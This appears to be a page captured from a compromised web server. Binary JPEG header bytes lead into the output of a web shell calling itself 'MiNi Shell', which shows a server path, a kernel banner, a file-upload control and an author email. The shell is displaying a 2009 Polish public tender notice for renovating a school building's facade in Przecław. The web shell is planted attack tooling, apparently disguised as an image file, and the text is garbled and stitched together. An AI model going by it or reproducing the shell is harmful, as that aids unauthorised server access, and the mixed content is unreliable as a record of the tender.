JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/162850-N-2009.html

<p class="kh_header"><b>Przecław: REMONT ELEWACJI BUDYNKU ZESPOŁU  SZKÓŁ W PRZECŁAWIU</b><br>
<b>Numer ogłoszenia: 162850 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Przecławiu , Przecław 27A, 72-005 Przecław, woj. zachodniopomorskie, tel. 0-91 311 76 08, faks 0-91 311 76 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szkolaprzeclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół w Przecławiu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT ELEWACJI BUDYNKU ZESPOŁU  SZKÓŁ W PRZECŁAWIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest REMONT  ELEWACJI   BUDYNKU ZESPOŁU SZKÓŁ W PRZECŁAWIU, w szczególności:
- zabezpieczenie okien 
- wygrodzenie stref niebezpiecznych 
- przecieranie istniejących tynków 
- odbicie uszkodzonych tynków zewnętrznych 
- wykonanie szczeliny dyletacyjnej gzymsu z wypełnieniem spoiną elastyczną 
- dwukrotne malowanie elewacji farbami akrylowo silikonowymi zgodnie z istniejącą    kolorystyką 
- wymiana płytek okładzinowych ściennych klinkierowych układanych na kleju 
- montaż i demontaż rusztowań.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.10-1, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Ofertę należy złożyć w siedzibie Zamawiającego: 
ZESPOLE SZKÓŁ W PRZECŁAWIU  72-005 PRZECŁAW 27A pk. Nr 106
2. Ofertom będą nadawane numery wg kolejności wpływu. 
3. Termin składania ofert: 
1) Oferty należy składać do dnia 15.06.2009 r., do godz. 10,00
2) Za termin złożenia oferty uważa się termin jej dotarcia do Zamawiającego.
3) Wszelkie oferty wniesione po terminie zostaną zwrócone wykonawcom bez otwierania po upływie terminu przewidzianego na wniesienie protestu. 
4. Otwarcie ofert nastąpi w dniu .15.06.2009 r. o godz. 10,00 w siedzibie ZESPOLE SZKÓŁ W PRZECŁAWIU  72-005 PRZECŁAW 27A / pok.103/
	
5. Oferty będą  podlegać  rejestracji  przez  zamawiającego.  Każda  przyjęta  oferta  zostanie  opatrzona  adnotacją określającą dokładny termin przyjęcia oferty tzn. datę kalendarzową oraz godzinę i minutę, w której została przyjęta. Do czasu otwarcia ofert, będą one przechowywane w sposób gwarantujący ich nienaruszalność.

6. Postępowanie toczyć się będzie z podziałem na część: jawną i niejawną.
7. Zamawiający bezpośrednio  przed otwarciem  ofert poda kwotę, jaką zamierza  przeznaczyć  na sfinansowanie zamówienia. Następnie zamawiający otworzy koperty z ofertami i ogłosi nazwę (firmę) i adres wykonawcy, którego oferta jest otwierana, a także informacje dotyczące ceny oferty, terminu wykonania zamówienia, okresu gwarancji - zawartych w ofercie.
8. Informacje, o których mowa w pkt 7 zamawiający przekaże niezwłocznie wykonawcom, którzy nie byli obecni przy otwarciu ofert, na ich wniosek.

	Jedynym kryterium oceny ofert jest cena - 100%.
2. Sposób przyznania punktów w kryterium cena:
cena najniższa
------------------------------------------------ 	x 100 pkt x znaczenie  kryterium 100 %
cena oferty ocenianej
3. 	Wykonawca pozostaje związany ofertą przez okres 30 dni.
4. 	Wykonawca samodzielnie lub na wniosek zamawiającego  może przedłużyć  termin związania ofertą, na czas niezbędny do zawarcia umowy w sprawie zamówienia publicznego,  z tym że zamawiający może tylko raz, co najmniej na 3 dni przed upływem terminu związania ofertą, zwrócić się  do wykonawcy o wyrażenie zgody na przedłużenie tego terminu o oznaczony okres, nie dłuższy jednak niż 60 dni.
5. 	Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
6. 	Zamawiający  dokona  badania  ofert  w  celu  stwierdzenia,  czy  wykonawcy  nie  podlegają  wykluczeniu.  W przypadku wykluczenia wykonawcy zamawiający odrzuci jego ofertę. Następnie zamawiający dokona oceny, czy oferty wykonawców nie wykluczonych z postępowania nie podlegają odrzuceniu.
7. 	W  toku  badania  i  oceny  ofert  zamawiający  może  żądać  od  wykonawców  wyjaśnień  dotyczących  treści złożonych ofert i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu.
8. 	Zamawiający zgodnie z art. 87 ust. 2 ustawy Prawo zamówień publicznych, poprawi w tekście oferty:
1)   Oczywiste omyłki pisarskie,
2)   Oczywiste  omyłki  rachunkowe,  z  uwzględnieniem  konsekwencji  rachunkowych  dokonanych poprawek,
3)   Inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia, niepowodujące istotnych zmian w treści oferty
- niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.
9. 	Jeżeli oferta zawierać będzie rażąco niską cenę w stosunku do przedmiotu zamówienia, zamawiający zwróci się w formie  pisemnej  do wykonawcy  o udzielenie  w określonym  terminie  wyjaśnień  dotyczących  elementów oferty mających wpływ na wysokość ceny.
10.  Zamawiający odrzuci ofertę, jeżeli:
1)    jest niezgodna z ustawą,
2)    jej treść nie odpowiada treści siwz, z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy Pzp
3)    jej złożenie  stanowi  czyn  nieuczciwej  konkurencji  w rozumieniu  przepisów  o zwalczaniu  nieuczciwej konkurencji,
4)    zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5)    została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6)    zawiera błędy w obliczeniu ceny,
7)    wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt. 3,
8)    jest nieważna na podstawie odrębnych przepisów.
11.  Oferty nie odrzucone zostaną poddane procedurze oceny zgodnie z kryteriami oceny ofert określonymi w siwz.
12.  Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w siwz.
13.  Niezwłocznie po wyborze najkorzystniejszej oferty zamawiający zawiadomi wykonawców, którzy złożyli oferty o:
1)   wyborze najkorzystniejszej oferty, podając nazwę (firmę) i adres tego wykonawcy, którego ofertę wybrano, oraz uzasadnienie jej wyboru, a także nazwy (firmy), siedziby i adresy wykonawców, którzy założyli oferty

	Strona 8 z 11 

wraz ze streszczeniem oceny i porównania złożonych ofert zawierającym punktację przyznaną ofertom w każdym kryterium oceny ofert i łączną punktację,
2)   wykonawcach, których oferty zostały odrzucone, podając uzasadnienie faktyczne i prawne,
3)   wykonawcach, którzy zostali wykluczeni z postępowania, podając uzasadnienie faktyczne i prawne
14.  Niezwłocznie po wyborze najkorzystniejszej oferty zamawiający zamieszcza informacje o których mowa w pkt.
14.1)  na stronie internetowej oraz w miejscu publicznie dostępnym w swojej siedzibie.
15.  W  przypadku  wystąpienia  przesłanek,  o  których  mowa  w  art.  93  ust.  1  ustawy  zamawiający  unieważnia postępowanie.
16.  O unieważnieniu postępowania zamawiający zawiadomi równocześnie wszystkich wykonawców, którzy:
1)   ubiegali się o udzielenie zamówienia, - w przypadku unieważnienia postępowania przed upływem terminu składania ofert,
2)   złożyli oferty - w przypadku unieważnienia postępowania po upływie terminu składania ofert
- podając uzasadnienie faktyczne i prawne.
17.  Zamawiający zwróci wykonawcom, których oferty nie zostały wybrane, na ich wniosek, złożone przez nich plany, projekty, rysunki, modele, próbki, wzory, programy komputerowe oraz inne podobne materiały..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)   posiadają  uprawnienia  do wykonywania  określonej  działalności  lub  czynności,  jeżeli  ustawy nakładają
obowiązek posiadania takich uprawnień,
2)   posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia  lub przedstawią  pisemne  zobowiązanie  innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia
3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ustawy
5)   spełniają następujące warunki dodatkowe:
- posiadają doświadczenie zawodowe ,wyrażające się zrealizowaniem w okresie 5lat co najmniej2 robót budowlanych możliwie zbliżonych do przedmiotu zamówienia tj.  Remont  elewacji budynków ,
 - posiadają odpowiedni potencjał kadrowy -pracowników z branży budowlanej z niezbędnymi uprawnieniami ,przynależnymi do Izby Inżynierów i Techników
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.

2. 	Każdy z wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)   Oświadczenie wykonawcy, według wzoru, stanowiącego załącznik nr 2 do niniejszej siwz:
a)    o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1,2,3 ustawy,
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców składających ofertę wspólną.
b)   o spełnianiu warunków określonych w art. 22 ust. 1 pkt 4 ustawy,
W  przypadku  składania  oferty  wspólnej  ww.  oświadczenie  składa  każdy z  wykonawców  składających ofertę wspólna.
2)  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej   (jeżeli  odrębne   przepisy   wymagają   wpisu  do  rejestru  lub  zgłoszenia   do  ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę
wspólną.
3)  Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji  zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także  zakresu  wykonywanych  przez  nie  czynności  według  wzoru,  stanowiącego  załącznik  nr  3  do niniejszej siwz.
W przypadku składania oferty wspólnej wykonawcy składają jeden wspólny wykaz osób i podmiotów.
4)    Dokumenty stwierdzające, że osoby, o których mowa w ppkt 3), posiadają wymagane uprawnienia wraz   z   dokumentami   potwierdzającymi   przynależność   tych   osób   do   właściwej   izby   samorządu zawodowego aktualne na dzień składania ofert.
5)   Wykaz wykonanych robót budowlanych (prac podobnych określonych w pkt. 1.5)b) tego rozdziału) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania według wzoru, stanowiącego załącznik nr 4 do niniejszej siwz oraz dokumenty - np. protokoły odbioru, referencje potwierdzające, że roboty te zostały wykonane należycie.
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz.
	Strona 4 z 11 

3. 	Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)    ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)    pełnomocnictwo o którym mowa w Rozdziale III pkt 1 siwz;
Tylko w przypadku składania oferty wspólnej
3)    oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie 	wykonawca 	powierzy 	podwykonawcom 	(jeżeli 	wykonawca 	przewiduje 	udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4. 	Zamawiający  wezwie  na podstawie  art. 26 ust. 3 wykonawców,  którzy w określonym  terminie nie złożyli wymaganych przez Zamawiającego oświadczeń  lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy  nie  złożyli  pełnomocnictw,  albo  którzy  złożyli  wymagane  przez  Zamawiającego oświadczenia  i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym  terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne   byłoby   unieważnienie  postępowania.   Złożone   na wezwanie   Zamawiającego   oświadczenia   i dokumenty  powinny  potwierdzać  spełnianie  przez Wykonawcę  warunków  udziału  w  postępowaniu  oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert
5.	Wykonawcy, którzy nie spełnią warunków określonych w pkt 1 zostaną wykluczeni z postępowania zgodnie z art. 24 ustawy.

6. 	Zamawiający nie żąda wniesienia wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kolbaskowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespoł Szkół w Przecławiu
72-005 Przecław 27A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 10:00, miejsce: Zespoł Szkół w Przecławiu
72-005 Przecław 27A
pokój 106.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 24 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com